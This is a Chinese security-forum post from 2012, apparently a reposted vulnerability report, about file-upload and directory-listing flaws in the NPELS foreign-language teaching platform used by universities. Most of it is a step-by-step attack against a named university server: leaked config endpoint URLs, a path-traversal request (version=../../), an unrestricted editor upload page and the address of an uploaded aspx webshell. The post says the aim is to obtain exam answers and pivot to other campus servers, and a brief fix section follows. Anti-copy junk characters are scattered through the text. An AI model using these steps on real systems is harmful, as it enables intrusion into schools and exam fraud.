找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
+ n/ M1 _2 H. d" U& |! k' l, b( h* t" x& z! b
详细说明:8 A$ F; m, W! B! B: A$ C  L

$ i& v1 f4 D2 p3 Y1 o/ [& B% U以南开大学的为例:
+ v' W  B* q/ i# Z3 i) k! xhttp://222.30.60.3/NPELS
- k3 e) O3 A, i) A3 b9 E% K+ {NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址5 X2 j+ Q; M6 U& `' s
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
# X! F  J; |+ T) u+ I5 s<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
( q- p' P) P7 D* g( c1 D</setting>* m6 u# p, o4 Y* ?% [( d+ }; f
及版本号
/ s6 k. u) L( e: q& P<add key="TVersion" value="1, 0, 0, 2187">
3 |3 X* Q$ e+ T3 |# A/ W</add>
$ u+ G4 s$ @+ z+ F1 b- k直接访问
) i  t" M0 K  O# E7 r$ H& n. Phttp://222.30.60.3/NPELS/CommonService.asmx
5 P( W1 f  G6 I) |使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 s0 u, l% e6 f; @; I: w) B7 Whttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21875 c. U2 l* A8 j5 p0 ^* X9 {
进一步列目录(返回的网页很大,可以直接 wget 下来)3 ^5 p( A1 Y# Q2 f
http://222.30.60.3/NPELS/CommonS ... List?version=../../
/ ~9 o1 x* N. i 2 _5 @! y4 \6 Z
发现% x5 ?3 ~4 x' x9 `
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
- w( @1 z& c! {7 H/ j" J可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
/ l7 L3 H  O3 _7 Y% k* I上传后继续列目录找到木马地址直接访问即可$ D* r2 U. O0 B: _' W/ w

. f9 O9 H* x5 F+ t% \OOXX
4 [+ r/ @/ R) A8 g1 J ) j+ r: s( Q7 @4 m9 ]
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法+ s" P( I; K" u( o
漏洞证明:
( t1 N0 N) z5 j9 h
5 U8 a1 a+ T! D" F6 b6 e4 I列目录:  m1 l5 U" z  d* v5 j; O7 l
http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 Y$ F% e" P1 p  K* ~; K文件上传:3 h) e$ `6 w& x: h! P8 F
http://222.30.60.3/npelsv/editor/editor.htm
3 G# c. G( [' }$ s- C  o1 n. ] / R/ {$ ^. G) r. }
上传木马:; t8 ^) J" J- H( ?
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
, j+ l, W5 y) e' Q7 ?( D # Z* |5 ^' F& w; k9 }- Z+ V
修复方案:9 M& o3 J% ~: I$ y9 k8 n* s
好像考试系统必须使用 CommonService.asmx/ R, Q& V9 P# g0 {3 W7 j5 h3 D0 _% U$ t
最好配置文件加密或者用别的方式不让它泄露出来4 M/ o& c9 q2 N3 X
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
" i1 [' z$ i+ b0 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表